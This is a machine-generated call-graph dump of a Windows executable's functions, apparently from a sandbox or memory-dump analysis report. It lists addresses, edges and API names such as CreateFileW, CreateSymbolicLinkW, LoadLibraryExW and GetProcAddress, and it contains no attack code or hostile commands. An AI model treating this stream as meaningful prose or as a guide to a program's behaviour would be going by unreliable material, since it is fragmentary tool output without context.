16723 7ff72c6526d5 16722->16723 16724 7ff72c664bd8 48 API calls 16723->16724 16725 7ff72c6526f8 16724->16725 16725->16695 16729 7ff72c664c32 16726->16729 16727 7ff72c664c57 16728 7ff72c66a814 _invalid_parameter_noinfo 37 API calls 16727->16728 16743 7ff72c664c81 16728->16743 16729->16727 16730 7ff72c664c93 16729->16730 16744 7ff72c662f90 16730->16744 16733 7ff72c664d74 16735 7ff72c66a948 __free_lconv_mon 11 API calls 16733->16735 16734 7ff72c65c550 _log10_special 8 API calls 16736 7ff72c652d04 16734->16736 16735->16743 16736->16698 16737 7ff72c664d9a 16737->16733 16739 7ff72c664da4 16737->16739 16738 7ff72c664d49 16740 7ff72c66a948 __free_lconv_mon 11 API calls 16738->16740 16742 7ff72c66a948 __free_lconv_mon 11 API calls 16739->16742 16740->16743 16741 7ff72c664d40 16741->16733 16741->16738 16742->16743 16743->16734 16745 7ff72c662fce 16744->16745 16746 7ff72c662fbe 16744->16746 16747 7ff72c662fd7 16745->16747 16751 7ff72c663005 16745->16751 16748 7ff72c66a814 _invalid_parameter_noinfo 37 API calls 16746->16748 16749 7ff72c66a814 _invalid_parameter_noinfo 37 API calls 16747->16749 16750 7ff72c662ffd 16748->16750 16749->16750 16750->16733 16750->16737 16750->16738 16750->16741 16751->16746 16751->16750 16755 7ff72c6639a4 16751->16755 16788 7ff72c6633f0 16751->16788 16825 7ff72c662b80 16751->16825 16756 7ff72c663a57 16755->16756 16757 7ff72c6639e6 16755->16757 16760 7ff72c663a5c 16756->16760 16761 7ff72c663ab0 16756->16761 16758 7ff72c6639ec 16757->16758 16759 7ff72c663a81 16757->16759 16762 7ff72c663a20 16758->16762 16763 7ff72c6639f1 16758->16763 16848 7ff72c661d54 16759->16848 16764 7ff72c663a91 16760->16764 16770 7ff72c663a5e 16760->16770 16765 7ff72c663abf 16761->16765 16766 7ff72c663ac7 16761->16766 16767 7ff72c663aba 16761->16767 16762->16765 16771 7ff72c6639f7 16762->16771 16763->16766 16763->16771 16855 7ff72c661944 16764->16855 16786 7ff72c663af0 16765->16786 16866 7ff72c662164 16765->16866 16862 7ff72c6646ac 16766->16862 16767->16759 16767->16765 16769 
7ff72c663a00 16769->16786 16828 7ff72c664158 16769->16828 16770->16769 16775 7ff72c663a6d 16770->16775 16771->16769 16776 7ff72c663a32 16771->16776 16784 7ff72c663a1b 16771->16784 16775->16759 16778 7ff72c663a72 16775->16778 16776->16786 16838 7ff72c664494 16776->16838 16778->16786 16844 7ff72c664558 16778->16844 16780 7ff72c65c550 _log10_special 8 API calls 16782 7ff72c663dea 16780->16782 16782->16751 16784->16786 16787 7ff72c663cdc 16784->16787 16873 7ff72c6647c0 16784->16873 16786->16780 16787->16786 16879 7ff72c66ea08 16787->16879 16789 7ff72c6633fe 16788->16789 16790 7ff72c663414 16788->16790 16792 7ff72c663454 16789->16792 16793 7ff72c663a57 16789->16793 16794 7ff72c6639e6 16789->16794 16791 7ff72c66a814 _invalid_parameter_noinfo 37 API calls 16790->16791 16790->16792 16791->16792 16792->16751 16797 7ff72c663a5c 16793->16797 16798 7ff72c663ab0 16793->16798 16795 7ff72c6639ec 16794->16795 16796 7ff72c663a81 16794->16796 16799 7ff72c663a20 16795->16799 16800 7ff72c6639f1 16795->16800 16805 7ff72c661d54 38 API calls 16796->16805 16801 7ff72c663a5e 16797->16801 16802 7ff72c663a91 16797->16802 16803 7ff72c663ac7 16798->16803 16804 7ff72c663aba 16798->16804 16808 7ff72c663abf 16798->16808 16806 7ff72c6639f7 16799->16806 16799->16808 16800->16803 16800->16806 16807 7ff72c663a00 16801->16807 16814 7ff72c663a6d 16801->16814 16810 7ff72c661944 38 API calls 16802->16810 16809 7ff72c6646ac 45 API calls 16803->16809 16804->16796 16804->16808 16822 7ff72c663a1b 16805->16822 16806->16807 16812 7ff72c663a32 16806->16812 16806->16822 16811 7ff72c664158 47 API calls 16807->16811 16824 7ff72c663af0 16807->16824 16813 7ff72c662164 38 API calls 16808->16813 16808->16824 16809->16822 16810->16822 16811->16822 16815 7ff72c664494 46 API calls 16812->16815 16812->16824 16813->16822 16814->16796 16816 7ff72c663a72 16814->16816 16815->16822 16818 7ff72c664558 37 API calls 16816->16818 16816->16824 16817 7ff72c65c550 _log10_special 8 API calls 16819 7ff72c663dea 16817->16819 
16818->16822 16819->16751 16820 7ff72c663cdc 16823 7ff72c66ea08 46 API calls 16820->16823 16820->16824 16821 7ff72c6647c0 45 API calls 16821->16820 16822->16820 16822->16821 16822->16824 16823->16820 16824->16817 17105 7ff72c660fc8 16825->17105 16829 7ff72c66417e 16828->16829 16891 7ff72c660b80 16829->16891 16834 7ff72c6647c0 45 API calls 16835 7ff72c6642c3 16834->16835 16836 7ff72c6647c0 45 API calls 16835->16836 16837 7ff72c664351 16835->16837 16836->16837 16837->16784 16840 7ff72c6644c9 16838->16840 16839 7ff72c6644e7 16843 7ff72c66ea08 46 API calls 16839->16843 16840->16839 16841 7ff72c66450e 16840->16841 16842 7ff72c6647c0 45 API calls 16840->16842 16841->16784 16842->16839 16843->16841 16846 7ff72c664579 16844->16846 16845 7ff72c66a814 _invalid_parameter_noinfo 37 API calls 16847 7ff72c6645aa 16845->16847 16846->16845 16846->16847 16847->16784 16849 7ff72c661d87 16848->16849 16850 7ff72c661db6 16849->16850 16852 7ff72c661e73 16849->16852 16854 7ff72c661df3 16850->16854 17037 7ff72c660c28 16850->17037 16853 7ff72c66a814 _invalid_parameter_noinfo 37 API calls 16852->16853 16853->16854 16854->16784 16856 7ff72c661977 16855->16856 16857 7ff72c6619a6 16856->16857 16859 7ff72c661a63 16856->16859 16858 7ff72c660c28 12 API calls 16857->16858 16861 7ff72c6619e3 16857->16861 16858->16861 16860 7ff72c66a814 _invalid_parameter_noinfo 37 API calls 16859->16860 16860->16861 16861->16784 16863 7ff72c6646ef 16862->16863 16865 7ff72c6646f3 __crtLCMapStringW 16863->16865 17045 7ff72c664748 16863->17045 16865->16784 16867 7ff72c662197 16866->16867 16868 7ff72c6621c6 16867->16868 16870 7ff72c662283 16867->16870 16869 7ff72c660c28 12 API calls 16868->16869 16872 7ff72c662203 16868->16872 16869->16872 16871 7ff72c66a814 _invalid_parameter_noinfo 37 API calls 16870->16871 16871->16872 16872->16784 16874 7ff72c6647d7 16873->16874 17049 7ff72c66d9b8 16874->17049 16881 7ff72c66ea39 16879->16881 16889 7ff72c66ea47 16879->16889 16880 7ff72c66ea67 16883 7ff72c66ea78 16880->16883 16884 
7ff72c66ea9f 16880->16884 16881->16880 16882 7ff72c6647c0 45 API calls 16881->16882 16881->16889 16882->16880 17095 7ff72c6700a0 16883->17095 16886 7ff72c66eac9 16884->16886 16887 7ff72c66eb2a 16884->16887 16884->16889 16886->16889 17098 7ff72c66f8a0 16886->17098 16888 7ff72c66f8a0 _fread_nolock MultiByteToWideChar 16887->16888 16888->16889 16889->16787 16892 7ff72c660bb7 16891->16892 16898 7ff72c660ba6 16891->16898 16892->16898 16921 7ff72c66d5fc 16892->16921 16895 7ff72c660bf8 16896 7ff72c66a948 __free_lconv_mon 11 API calls 16895->16896 16896->16898 16897 7ff72c66a948 __free_lconv_mon 11 API calls 16897->16895 16899 7ff72c66e570 16898->16899 16900 7ff72c66e58d 16899->16900 16901 7ff72c66e5c0 16899->16901 16902 7ff72c66a814 _invalid_parameter_noinfo 37 API calls 16900->16902 16901->16900 16904 7ff72c66e5f2 16901->16904 16911 7ff72c6642a1 16902->16911 16903 7ff72c66e705 16905 7ff72c66e7f7 16903->16905 16907 7ff72c66e7bd 16903->16907 16909 7ff72c66e78c 16903->16909 16912 7ff72c66e74f 16903->16912 16913 7ff72c66e745 16903->16913 16904->16903 16916 7ff72c66e63a 16904->16916 16961 7ff72c66da5c 16905->16961 16954 7ff72c66ddf4 16907->16954 16947 7ff72c66e0d4 16909->16947 16911->16834 16911->16835 16937 7ff72c66e304 16912->16937 16913->16907 16915 7ff72c66e74a 16913->16915 16915->16909 16915->16912 16916->16911 16928 7ff72c66a4a4 16916->16928 16919 7ff72c66a900 _isindst 17 API calls 16920 7ff72c66e854 16919->16920 16922 7ff72c66d647 16921->16922 16926 7ff72c66d60b memcpy_s 16921->16926 16924 7ff72c664f08 memcpy_s 11 API calls 16922->16924 16923 7ff72c66d62e HeapAlloc 16925 7ff72c660be4 16923->16925 16923->16926 16924->16925 16925->16895 16925->16897 16926->16922 16926->16923 16927 7ff72c673590 memcpy_s 2 API calls 16926->16927 16927->16926 16929 7ff72c66a4bb 16928->16929 16930 7ff72c66a4b1 16928->16930 16931 7ff72c664f08 memcpy_s 11 API calls 16929->16931 16930->16929 16932 7ff72c66a4d6 16930->16932 16936 7ff72c66a4c2 16931->16936 16933 7ff72c66a4ce 16932->16933 16935 
7ff72c664f08 memcpy_s 11 API calls 16932->16935 16933->16911 16933->16919 16935->16936 16970 7ff72c66a8e0 16936->16970 16973 7ff72c6740ac 16937->16973 16941 7ff72c66e3ac 16942 7ff72c66e401 16941->16942 16943 7ff72c66e3cc 16941->16943 16946 7ff72c66e3b0 16941->16946 17026 7ff72c66def0 16942->17026 17022 7ff72c66e1ac 16943->17022 16946->16911 16948 7ff72c6740ac 38 API calls 16947->16948 16949 7ff72c66e11e 16948->16949 16950 7ff72c673af4 37 API calls 16949->16950 16951 7ff72c66e16e 16950->16951 16952 7ff72c66e172 16951->16952 16953 7ff72c66e1ac 45 API calls 16951->16953 16952->16911 16953->16952 16955 7ff72c6740ac 38 API calls 16954->16955 16956 7ff72c66de3f 16955->16956 16957 7ff72c673af4 37 API calls 16956->16957 16958 7ff72c66de97 16957->16958 16959 7ff72c66de9b 16958->16959 16960 7ff72c66def0 45 API calls 16958->16960 16959->16911 16960->16959 16962 7ff72c66dad4 16961->16962 16963 7ff72c66daa1 16961->16963 16965 7ff72c66daec 16962->16965 16967 7ff72c66db6d 16962->16967 16964 7ff72c66a814 _invalid_parameter_noinfo 37 API calls 16963->16964 16969 7ff72c66dacd memcpy_s 16964->16969 16966 7ff72c66ddf4 46 API calls 16965->16966 16966->16969 16968 7ff72c6647c0 45 API calls 16967->16968 16967->16969 16968->16969 16969->16911 16971 7ff72c66a778 _invalid_parameter_noinfo 37 API calls 16970->16971 16972 7ff72c66a8f9 16971->16972 16972->16933 16974 7ff72c6740ff fegetenv 16973->16974 16975 7ff72c677e2c 37 API calls 16974->16975 16979 7ff72c674152 16975->16979 16976 7ff72c67417f 16981 7ff72c66a4a4 __std_exception_copy 37 API calls 16976->16981 16977 7ff72c674242 16978 7ff72c677e2c 37 API calls 16977->16978 16980 7ff72c67426c 16978->16980 16979->16977 16982 7ff72c67421c 16979->16982 16983 7ff72c67416d 16979->16983 16984 7ff72c677e2c 37 API calls 16980->16984 16985 7ff72c6741fd 16981->16985 16988 7ff72c66a4a4 __std_exception_copy 37 API calls 16982->16988 16983->16976 16983->16977 16986 7ff72c67427d 16984->16986 16987 7ff72c675324 16985->16987 16992 7ff72c674205 16985->16992 
16989 7ff72c678020 20 API calls 16986->16989 16990 7ff72c66a900 _isindst 17 API calls 16987->16990 16988->16985 17000 7ff72c6742e6 memcpy_s 16989->17000 16991 7ff72c675339 16990->16991 16993 7ff72c65c550 _log10_special 8 API calls 16992->16993 16994 7ff72c66e351 16993->16994 17018 7ff72c673af4 16994->17018 16995 7ff72c67468f memcpy_s 16996 7ff72c6749cf 16997 7ff72c673c10 37 API calls 16996->16997 17004 7ff72c6750e7 16997->17004 16998 7ff72c67497b 16998->16996 17001 7ff72c67533c memcpy_s 37 API calls 16998->17001 16999 7ff72c674327 memcpy_s 17014 7ff72c674783 memcpy_s 16999->17014 17015 7ff72c674c6b memcpy_s 16999->17015 17000->16995 17000->16999 17002 7ff72c664f08 memcpy_s 11 API calls 17000->17002 17001->16996 17003 7ff72c674760 17002->17003 17005 7ff72c66a8e0 _invalid_parameter_noinfo 37 API calls 17003->17005 17006 7ff72c67533c memcpy_s 37 API calls 17004->17006 17017 7ff72c675142 17004->17017 17005->16999 17006->17017 17007 7ff72c6752c8 17008 7ff72c677e2c 37 API calls 17007->17008 17008->16992 17009 7ff72c664f08 11 API calls memcpy_s 17009->17014 17010 7ff72c664f08 11 API calls memcpy_s 17010->17015 17011 7ff72c673c10 37 API calls 17011->17017 17012 7ff72c66a8e0 37 API calls _invalid_parameter_noinfo 17012->17015 17013 7ff72c66a8e0 37 API calls _invalid_parameter_noinfo 17013->17014 17014->16998 17014->17009 17014->17013 17015->16996 17015->16998 17015->17010 17015->17012 17016 7ff72c67533c memcpy_s 37 API calls 17016->17017 17017->17007 17017->17011 17017->17016 17019 7ff72c673b13 17018->17019 17020 7ff72c66a814 _invalid_parameter_noinfo 37 API calls 17019->17020 17021 7ff72c673b3e memcpy_s 17019->17021 17020->17021 17021->16941 17023 7ff72c66e1d8 memcpy_s 17022->17023 17024 7ff72c6647c0 45 API calls 17023->17024 17025 7ff72c66e292 memcpy_s 17023->17025 17024->17025 17025->16946 17027 7ff72c66df2b 17026->17027 17031 7ff72c66df78 memcpy_s 17026->17031 17028 7ff72c66a814 _invalid_parameter_noinfo 37 API calls 17027->17028 17029 7ff72c66df57 17028->17029 
17029->16946 17030 7ff72c66dfe3 17032 7ff72c66a4a4 __std_exception_copy 37 API calls 17030->17032 17031->17030 17033 7ff72c6647c0 45 API calls 17031->17033 17036 7ff72c66e025 memcpy_s 17032->17036 17033->17030 17034 7ff72c66a900 _isindst 17 API calls 17035 7ff72c66e0d0 17034->17035 17036->17034 17038 7ff72c660c5f 17037->17038 17043 7ff72c660c4e 17037->17043 17039 7ff72c66d5fc _fread_nolock 12 API calls 17038->17039 17038->17043 17040 7ff72c660c90 17039->17040 17042 7ff72c66a948 __free_lconv_mon 11 API calls 17040->17042 17044 7ff72c660ca4 17040->17044 17041 7ff72c66a948 __free_lconv_mon 11 API calls 17041->17043 17042->17044 17043->16854 17044->17041 17046 7ff72c66476e 17045->17046 17047 7ff72c664766 17045->17047 17046->16865 17048 7ff72c6647c0 45 API calls 17047->17048 17048->17046 17050 7ff72c6647ff 17049->17050 17051 7ff72c66d9d1 17049->17051 17053 7ff72c66da24 17050->17053 17051->17050 17057 7ff72c673304 17051->17057 17054 7ff72c66480f 17053->17054 17055 7ff72c66da3d 17053->17055 17054->16787 17055->17054 17092 7ff72c672650 17055->17092 17069 7ff72c66b150 GetLastError 17057->17069 17061 7ff72c67335e 17061->17050 17070 7ff72c66b174 FlsGetValue 17069->17070 17071 7ff72c66b191 FlsSetValue 17069->17071 17072 7ff72c66b18b 17070->17072 17089 7ff72c66b181 17070->17089 17073 7ff72c66b1a3 17071->17073 17071->17089 17072->17071 17075 7ff72c66eb98 memcpy_s 11 API calls 17073->17075 17074 7ff72c66b1fd SetLastError 17076 7ff72c66b21d 17074->17076 17077 7ff72c66b20a 17074->17077 17078 7ff72c66b1b2 17075->17078 17079 7ff72c66a504 _CreateFrameInfo 38 API calls 17076->17079 17077->17061 17091 7ff72c6702d8 EnterCriticalSection 17077->17091 17080 7ff72c66b1d0 FlsSetValue 17078->17080 17081 7ff72c66b1c0 FlsSetValue 17078->17081 17082 7ff72c66b222 17079->17082 17084 7ff72c66b1ee 17080->17084 17085 7ff72c66b1dc FlsSetValue 17080->17085 17083 7ff72c66b1c9 17081->17083 17087 7ff72c66a948 __free_lconv_mon 11 API calls 17083->17087 17086 7ff72c66aef4 memcpy_s 11 API calls 17084->17086 
17085->17083 17088 7ff72c66b1f6 17086->17088 17087->17089 17090 7ff72c66a948 __free_lconv_mon 11 API calls 17088->17090 17089->17074 17090->17074 17093 7ff72c66b150 _CreateFrameInfo 45 API calls 17092->17093 17094 7ff72c672659 17093->17094 17101 7ff72c676d88 17095->17101 17100 7ff72c66f8a9 MultiByteToWideChar 17098->17100 17104 7ff72c676dec 17101->17104 17102 7ff72c65c550 _log10_special 8 API calls 17103 7ff72c6700bd 17102->17103 17103->16889 17104->17102 17106 7ff72c660ffd 17105->17106 17107 7ff72c66100f 17105->17107 17108 7ff72c664f08 memcpy_s 11 API calls 17106->17108 17110 7ff72c66101d 17107->17110 17114 7ff72c661059 17107->17114 17109 7ff72c661002 17108->17109 17111 7ff72c66a8e0 _invalid_parameter_noinfo 37 API calls 17109->17111 17112 7ff72c66a814 _invalid_parameter_noinfo 37 API calls 17110->17112 17119 7ff72c66100d 17111->17119 17112->17119 17113 7ff72c6613d5 17115 7ff72c664f08 memcpy_s 11 API calls 17113->17115 17113->17119 17114->17113 17116 7ff72c664f08 memcpy_s 11 API calls 17114->17116 17117 7ff72c661669 17115->17117 17118 7ff72c6613ca 17116->17118 17120 7ff72c66a8e0 _invalid_parameter_noinfo 37 API calls 17117->17120 17121 7ff72c66a8e0 _invalid_parameter_noinfo 37 API calls 17118->17121 17119->16751 17120->17119 17121->17113 17123 7ff72c660704 17122->17123 17150 7ff72c660464 17123->17150 17125 7ff72c66071d 17125->16287 17162 7ff72c6603bc 17126->17162 17130 7ff72c65c850 17129->17130 17131 7ff72c652930 GetCurrentProcessId 17130->17131 17132 7ff72c651c80 49 API calls 17131->17132 17133 7ff72c652979 17132->17133 17176 7ff72c664984 17133->17176 17138 7ff72c651c80 49 API calls 17139 7ff72c6529ff 17138->17139 17206 7ff72c652620 17139->17206 17142 7ff72c65c550 _log10_special 8 API calls 17143 7ff72c652a31 17142->17143 17143->16326 17145 7ff72c660119 17144->17145 17147 7ff72c651b89 17144->17147 17146 7ff72c664f08 memcpy_s 11 API calls 17145->17146 17148 7ff72c66011e 17146->17148 17147->16325 17147->16326 17149 7ff72c66a8e0 _invalid_parameter_noinfo 37 API 
calls 17148->17149 17149->17147 17151 7ff72c6604ce 17150->17151 17152 7ff72c66048e 17150->17152 17151->17152 17153 7ff72c6604da 17151->17153 17154 7ff72c66a814 _invalid_parameter_noinfo 37 API calls 17152->17154 17161 7ff72c66546c EnterCriticalSection 17153->17161 17156 7ff72c6604b5 17154->17156 17156->17125 17163 7ff72c6603e6 17162->17163 17174 7ff72c651a20 17162->17174 17164 7ff72c6603f5 memcpy_s 17163->17164 17165 7ff72c660432 17163->17165 17163->17174 17168 7ff72c664f08 memcpy_s 11 API calls 17164->17168 17175 7ff72c66546c EnterCriticalSection 17165->17175 17170 7ff72c66040a 17168->17170 17172 7ff72c66a8e0 _invalid_parameter_noinfo 37 API calls 17170->17172 17172->17174 17174->16294 17174->16295 17178 7ff72c6649de 17176->17178 17177 7ff72c664a03 17179 7ff72c66a814 _invalid_parameter_noinfo 37 API calls 17177->17179 17178->17177 17180 7ff72c664a3f 17178->17180 17182 7ff72c664a2d 17179->17182 17215 7ff72c662c10 17180->17215 17185 7ff72c65c550 _log10_special 8 API calls 17182->17185 17183 7ff72c664b1c 17184 7ff72c66a948 __free_lconv_mon 11 API calls 17183->17184 17184->17182 17187 7ff72c6529c3 17185->17187 17194 7ff72c665160 17187->17194 17188 7ff72c664b40 17188->17183 17191 7ff72c664b4a 17188->17191 17189 7ff72c664af1 17192 7ff72c66a948 __free_lconv_mon 11 API calls 17189->17192 17190 7ff72c664ae8 17190->17183 17190->17189 17193 7ff72c66a948 __free_lconv_mon 11 API calls 17191->17193 17192->17182 17193->17182 17195 7ff72c66b2c8 memcpy_s 11 API calls 17194->17195 17196 7ff72c665177 17195->17196 17197 7ff72c6529e5 17196->17197 17198 7ff72c66eb98 memcpy_s 11 API calls 17196->17198 17200 7ff72c6651b7 17196->17200 17197->17138 17199 7ff72c6651ac 17198->17199 17201 7ff72c66a948 __free_lconv_mon 11 API calls 17199->17201 17200->17197 17353 7ff72c66ec20 17200->17353 17201->17200 17204 7ff72c66a900 _isindst 17 API calls 17205 7ff72c6651fc 17204->17205 17207 7ff72c65262f 17206->17207 17208 7ff72c659390 2 API calls 17207->17208 17209 7ff72c652660 17208->17209 17210 
7ff72c652683 MessageBoxA 17209->17210 17211 7ff72c65266f MessageBoxW 17209->17211 17212 7ff72c652690 17210->17212 17211->17212 17213 7ff72c65c550 _log10_special 8 API calls 17212->17213 17214 7ff72c6526a0 17213->17214 17214->17142 17216 7ff72c662c4e 17215->17216 17217 7ff72c662c3e 17215->17217 17218 7ff72c662c57 17216->17218 17219 7ff72c662c85 17216->17219 17222 7ff72c66a814 _invalid_parameter_noinfo 37 API calls 17217->17222 17220 7ff72c66a814 _invalid_parameter_noinfo 37 API calls 17218->17220 17219->17217 17221 7ff72c662c7d 17219->17221 17223 7ff72c6647c0 45 API calls 17219->17223 17224 7ff72c662f34 17219->17224 17229 7ff72c6635a0 17219->17229 17255 7ff72c663268 17219->17255 17285 7ff72c662af0 17219->17285 17220->17221 17221->17183 17221->17188 17221->17189 17221->17190 17222->17221 17223->17219 17227 7ff72c66a814 _invalid_parameter_noinfo 37 API calls 17224->17227 17227->17217 17230 7ff72c663655 17229->17230 17231 7ff72c6635e2 17229->17231 17232 7ff72c66365a 17230->17232 17233 7ff72c6636af 17230->17233 17234 7ff72c6635e8 17231->17234 17235 7ff72c66367f 17231->17235 17236 7ff72c66365c 17232->17236 17237 7ff72c66368f 17232->17237 17233->17235 17246 7ff72c6636be 17233->17246 17252 7ff72c663618 17233->17252 17242 7ff72c6635ed 17234->17242 17234->17246 17302 7ff72c661b50 17235->17302 17238 7ff72c6635fd 17236->17238 17245 7ff72c66366b 17236->17245 17309 7ff72c661740 17237->17309 17253 7ff72c6636ed 17238->17253 17288 7ff72c663f04 17238->17288 17242->17238 17244 7ff72c663630 17242->17244 17242->17252 17244->17253 17298 7ff72c6643c0 17244->17298 17245->17235 17247 7ff72c663670 17245->17247 17246->17253 17316 7ff72c661f60 17246->17316 17250 7ff72c664558 37 API calls 17247->17250 17247->17253 17249 7ff72c65c550 _log10_special 8 API calls 17251 7ff72c663983 17249->17251 17250->17252 17251->17219 17252->17253 17323 7ff72c66e858 17252->17323 17253->17249 17256 7ff72c663289 17255->17256 17257 7ff72c663273 17255->17257 17258 7ff72c66a814 _invalid_parameter_noinfo 37 API calls 
17256->17258 17263 7ff72c6632c7 17256->17263 17259 7ff72c663655 17257->17259 17260 7ff72c6635e2 17257->17260 17257->17263 17258->17263 17261 7ff72c66365a 17259->17261 17262 7ff72c6636af 17259->17262 17264 7ff72c6635e8 17260->17264 17265 7ff72c66367f 17260->17265 17266 7ff72c66365c 17261->17266 17267 7ff72c66368f 17261->17267 17262->17265 17268 7ff72c6636be 17262->17268 17283 7ff72c663618 17262->17283 17263->17219 17264->17268 17272 7ff72c6635ed 17264->17272 17269 7ff72c661b50 38 API calls 17265->17269 17273 7ff72c6635fd 17266->17273 17276 7ff72c66366b 17266->17276 17270 7ff72c661740 38 API calls 17267->17270 17275 7ff72c661f60 38 API calls 17268->17275 17284 7ff72c6636ed 17268->17284 17269->17283 17270->17283 17271 7ff72c663f04 47 API calls 17271->17283 17272->17273 17274 7ff72c663630 17272->17274 17272->17283 17273->17271 17273->17284 17277 7ff72c6643c0 47 API calls 17274->17277 17274->17284 17275->17283 17276->17265 17278 7ff72c663670 17276->17278 17277->17283 17280 7ff72c664558 37 API calls 17278->17280 17278->17284 17279 7ff72c65c550 _log10_special 8 API calls 17281 7ff72c663983 17279->17281 17280->17283 17281->17219 17282 7ff72c66e858 47 API calls 17282->17283 17283->17282 17283->17284 17284->17279 17336 7ff72c660d14 17285->17336 17289 7ff72c663f26 17288->17289 17290 7ff72c660b80 12 API calls 17289->17290 17291 7ff72c663f6e 17290->17291 17292 7ff72c66e570 46 API calls 17291->17292 17293 7ff72c664041 17292->17293 17294 7ff72c6647c0 45 API calls 17293->17294 17295 7ff72c664063 17293->17295 17294->17295 17296 7ff72c6647c0 45 API calls 17295->17296 17297 7ff72c6640ec 17295->17297 17296->17297 17297->17252 17299 7ff72c664440 17298->17299 17300 7ff72c6643d8 17298->17300 17299->17252 17300->17299 17301 7ff72c66e858 47 API calls 17300->17301 17301->17299 17303 7ff72c661b83 17302->17303 17304 7ff72c661bb2 17303->17304 17306 7ff72c661c6f 17303->17306 17305 7ff72c660b80 12 API calls 17304->17305 17308 7ff72c661bef 17304->17308 17305->17308 17307 7ff72c66a814 
_invalid_parameter_noinfo 37 API calls 17306->17307 17307->17308 17308->17252 17310 7ff72c661773 17309->17310 17311 7ff72c6617a2 17310->17311 17313 7ff72c66185f 17310->17313 17312 7ff72c660b80 12 API calls 17311->17312 17315 7ff72c6617df 17311->17315 17312->17315 17314 7ff72c66a814 _invalid_parameter_noinfo 37 API calls 17313->17314 17314->17315 17315->17252 17317 7ff72c661f93 17316->17317 17318 7ff72c661fc2 17317->17318 17320 7ff72c66207f 17317->17320 17319 7ff72c660b80 12 API calls 17318->17319 17322 7ff72c661fff 17318->17322 17319->17322 17321 7ff72c66a814 _invalid_parameter_noinfo 37 API calls 17320->17321 17321->17322 17322->17252 17324 7ff72c66e880 17323->17324 17325 7ff72c66e8c5 17324->17325 17326 7ff72c6647c0 45 API calls 17324->17326 17327 7ff72c66e885 memcpy_s 17324->17327 17329 7ff72c66e8ae memcpy_s 17324->17329 17325->17327 17325->17329 17333 7ff72c6707e8 17325->17333 17326->17325 17327->17252 17328 7ff72c66a814 _invalid_parameter_noinfo 37 API calls 17328->17327 17329->17327 17329->17328 17335 7ff72c67080c WideCharToMultiByte 17333->17335 17337 7ff72c660d53 17336->17337 17338 7ff72c660d41 17336->17338 17341 7ff72c660d60 17337->17341 17344 7ff72c660d9d 17337->17344 17339 7ff72c664f08 memcpy_s 11 API calls 17338->17339 17340 7ff72c660d46 17339->17340 17342 7ff72c66a8e0 _invalid_parameter_noinfo 37 API calls 17340->17342 17343 7ff72c66a814 _invalid_parameter_noinfo 37 API calls 17341->17343 17348 7ff72c660d51 17342->17348 17343->17348 17345 7ff72c660e46 17344->17345 17346 7ff72c664f08 memcpy_s 11 API calls 17344->17346 17347 7ff72c664f08 memcpy_s 11 API calls 17345->17347 17345->17348 17349 7ff72c660e3b 17346->17349 17350 7ff72c660ef0 17347->17350 17348->17219 17352 7ff72c66a8e0 _invalid_parameter_noinfo 37 API calls 17349->17352 17351 7ff72c66a8e0 _invalid_parameter_noinfo 37 API calls 17350->17351 17351->17348 17352->17345 17357 7ff72c66ec3d 17353->17357 17354 7ff72c66ec42 17355 7ff72c6651dd 17354->17355 17356 7ff72c664f08 memcpy_s 11 API calls 
17354->17356 17355->17197 17355->17204 17358 7ff72c66ec4c 17356->17358 17357->17354 17357->17355 17360 7ff72c66ec8c 17357->17360 17359 7ff72c66a8e0 _invalid_parameter_noinfo 37 API calls 17358->17359 17359->17355 17360->17355 17361 7ff72c664f08 memcpy_s 11 API calls 17360->17361 17361->17358 17363 7ff72c658633 __vcrt_freefls 17362->17363 17364 7ff72c6585b1 GetTokenInformation 17362->17364 17367 7ff72c65864c 17363->17367 17368 7ff72c658646 CloseHandle 17363->17368 17365 7ff72c6585dd 17364->17365 17366 7ff72c6585d2 GetLastError 17364->17366 17365->17363 17369 7ff72c6585f9 GetTokenInformation 17365->17369 17366->17363 17366->17365 17367->16344 17368->17367 17369->17363 17371 7ff72c65861c 17369->17371 17370 7ff72c658626 ConvertSidToStringSidW 17370->17363 17371->17363 17371->17370 17373 7ff72c65c850 17372->17373 17374 7ff72c652b74 GetCurrentProcessId 17373->17374 17375 7ff72c6526b0 48 API calls 17374->17375 17376 7ff72c652bc7 17375->17376 17377 7ff72c664bd8 48 API calls 17376->17377 17378 7ff72c652c10 MessageBoxW 17377->17378 17379 7ff72c65c550 _log10_special 8 API calls 17378->17379 17380 7ff72c652c40 17379->17380 17380->16354 17382 7ff72c6525e5 17381->17382 17383 7ff72c664bd8 48 API calls 17382->17383 17384 7ff72c652604 17383->17384 17384->16370 17430 7ff72c668794 17385->17430 17389 7ff72c6581dc 17388->17389 17390 7ff72c659390 2 API calls 17389->17390 17391 7ff72c6581fb 17390->17391 17392 7ff72c658203 17391->17392 17393 7ff72c658216 ExpandEnvironmentStringsW 17391->17393 17395 7ff72c652810 49 API calls 17392->17395 17394 7ff72c65823c __vcrt_freefls 17393->17394 17396 7ff72c658253 17394->17396 17397 7ff72c658240 17394->17397 17419 7ff72c65820f __vcrt_freefls 17395->17419 17401 7ff72c6582bf 17396->17401 17402 7ff72c658261 GetDriveTypeW 17396->17402 17398 7ff72c652810 49 API calls 17397->17398 17398->17419 17399 7ff72c65c550 _log10_special 8 API calls 17400 7ff72c6583af 17399->17400 17400->16368 17420 7ff72c668238 17400->17420 17568 7ff72c667e08 17401->17568 17406 
[Call-graph edge list for the image loaded at 00007FF72C650000 (memory dump source listed below), exported by the report as a token stream: each node is "<id> <virtual address>" followed by an optional symbol, Win32 API name or "<n> API calls" for a collapsed subgraph, and edges are written "<src>-><dst>". The graph is rendered interactively in the report; the information recoverable from this text export is the set of Win32 APIs reached and the block addresses that call them:
• CreateDirectoryW: 7ff72c658328, 7ff72c65834e, 7ff72c657f23
• CreateSymbolicLinkW: 7ff72c65474b
• GetFullPathNameW: 7ff72c667bd8, 7ff72c667c4c, 7ff72c667cef
• GetCurrentDirectoryW: 7ff72c66f5ee
• GetDriveTypeW: 7ff72c670791, 7ff72c665cc4
• LoadLibraryExW: 7ff72c658e94
• GetProcAddress: 7ff72c655830, 7ff72c65587f, 7ff72c6558aa, 7ff72c6558d5, 7ff72c655903, 7ff72c655931
• CreateFileW: 7ff72c665672; GetFileType: 7ff72c66577c; GetFileInformationByHandle: 7ff72c6657f6; PeekNamedPipe: 7ff72c6658d4; CloseHandle: 7ff72c6656bb, 7ff72c6656d1
• FileTimeToSystemTime: 7ff72c66594d; SystemTimeToTzSpecificLocalTime: 7ff72c665961
• FlsGetValue: 7ff72c66b235; FlsSetValue: 7ff72c66b250, 7ff72c66b27a, 7ff72c66b28a, 7ff72c66b296
